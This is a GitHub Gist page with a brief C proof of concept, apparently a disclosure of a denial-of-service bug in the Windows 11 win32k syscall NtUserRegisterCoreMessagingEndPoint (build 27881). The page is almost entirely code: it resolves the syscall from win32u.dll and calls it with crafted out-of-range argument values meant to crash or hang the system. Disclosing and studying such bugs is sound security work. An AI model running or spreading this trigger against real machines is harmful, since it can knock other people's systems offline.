Created
June 29, 2025 06:51
-
-
Save hfiref0x/0344e5e99e6eb43bda58c9525418cf30 to your computer and use it in GitHub Desktop.
Denial of Service bug in Windows 11 (27881 build) NtUserRegisterCoreMessagingEndPoint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef NTSTATUS(WINAPI* PFN_NtUserRegisterCoreMessagingEndPoint)( | |
| ULONG_PTR, ULONG_PTR, ULONG_PTR, ULONG_PTR | |
| ); | |
| int main(void) { | |
| HMODULE hUser32 = LoadLibrary(L"user32.dll"); | |
| if (!hUser32) { | |
| printf("Failed to load user32.dll (Error %lu)\n", GetLastError()); | |
| return 1; | |
| } | |
| HMODULE hWin32u = LoadLibrary(L"win32u.dll"); | |
| if (!hWin32u) { | |
| printf("Failed to load win32u.dll (Error %lu)\n", GetLastError()); | |
| FreeLibrary(hUser32); | |
| return 1; | |
| } | |
| PFN_NtUserRegisterCoreMessagingEndPoint fn = (PFN_NtUserRegisterCoreMessagingEndPoint) | |
| GetProcAddress(hWin32u, "NtUserRegisterCoreMessagingEndPoint"); | |
| if (!fn) { | |
| printf("Failed to get NtUserRegisterCoreMessagingEndPoint (Error %lu)\n", GetLastError()); | |
| return 1; | |
| } | |
| ULONG_PTR arg0 = 0x00007FFFFFFEFFFFULL; | |
| ULONG_PTR arg1 = 0x0000000000000000ULL; | |
| ULONG_PTR arg2 = 0xBAADF00DBAADF00DULL; | |
| ULONG_PTR arg3 = 0xFFFFFFFFC0000001ULL; | |
| NTSTATUS status = fn(arg0, arg1, arg2, arg3); | |
| printf("NtUserRegisterCoreMessagingEndPoint(0x%016llX, 0x%016llX, 0x%016llX, 0x%016llX) => 0x%08lX\n", | |
| arg0, arg1, arg2, arg3, status); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment